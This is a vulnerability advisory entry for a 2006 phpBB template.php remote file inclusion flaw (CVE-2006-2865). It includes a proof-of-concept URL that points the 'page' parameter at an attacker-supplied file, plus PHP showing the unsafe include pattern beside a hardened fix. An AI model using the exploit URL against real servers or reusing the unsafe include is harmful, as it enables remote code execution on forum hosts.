phpBB template.php Remote File Inclusion Vulnerability

Vulnerability ID: 1110373    Vulnerability type: Input validation
Published: 2006-06-02    Updated: 2006-06-12
CVE: CVE-2006-2865    CNNVD ID: CNNVD-200606-136
Platform: PHP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/27961
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-136
|Vulnerability details
phpBB is a widely used open-source, web-based forum application written in PHP. It supports several databases as its back end, such as Oracle, MSSQL, MySQL and PostgreSQL. phpBB's implementation contains an input validation flaw: a remote attacker can exploit a remote file inclusion vulnerability in phpBB's template.php module to execute arbitrary commands.
|Vulnerability exploit
source: http://www.securityfocus.com/bid/18255/info

The phpBB application is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/[path_to_phpbb]/template.php?page=[attacker]
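As an added illustration, not phpBB's own template.php code, the following shows the include pattern the advisory describes next to a hardened lookup for the same `page` parameter; the template directory, the file naming and the allowlist of page names are assumptions:

```php
<?php
// Added illustration of the flaw class in this advisory, not phpBB's code.

// Vulnerable pattern (do not use): the raw `page` value reaches include(),
// so a remote URL or traversal path supplied by the client is loaded as PHP.
function include_template_unsafe(string $page): void
{
    include $page;
}

// Hardened lookup: the request value is only a key into a fixed allowlist,
// and the chosen file must resolve beneath one template directory.
const TEMPLATE_DIR = __DIR__ . '/templates';            // assumption
const ALLOWED_PAGES = ['index', 'viewforum', 'viewtopic']; // assumption

function resolve_template(string $page): ?string
{
    // A bare allowlisted identifier excludes scheme prefixes (http://,
    // ftp://, php://) and path separators before any filesystem access.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    $base = realpath(TEMPLATE_DIR);
    $candidate = realpath(TEMPLATE_DIR . '/' . $page . '.tpl.php');
    // realpath() returns false for a missing file; also confirm the resolved
    // path still sits under the template directory (symlinks resolved).
    if ($base === false || $candidate === false
        || strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

function include_template_safe(string $page): bool
{
    $file = resolve_template($page);
    if ($file === null) {
        http_response_code(404);
        return false;
    }
    include $file;
    return true;
}

// Usage: include_template_safe($_GET['page'] ?? 'index');
// Defence in depth: keep allow_url_include=Off in php.ini so that include()
// cannot fetch remote code even if a similar bug reappears elsewhere.
```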
|References

Source: BID
Name: 18255
Link: http://www.securityfocus.com/bid/18255
Source: BUGTRAQ
Name: 20060606 Re: phpBB2 (template.php) Remote File Inclusion
Link: http://www.securityfocus.com/archive/1/archive/1/436118/100/0/threaded
Source: BUGTRAQ
Name: 20060603 phpBB2 (template.php) Remote File Inclusion
Link: http://www.securityfocus.com/archive/1/archive/1/435869/100/0/threaded
Source: BUGTRAQ
Name: 20060605 Re: phpBB2 (template.php) Remote File Inclusion
Link: http://www.securityfocus.com/archive/1/435995/100/0/threaded
Source: BUGTRAQ
Name: 20060604 RE: phpBB2 (template.php) Remote File Inclusion
Link: http://www.securityfocus.com/archive/1/435978/100/0/threaded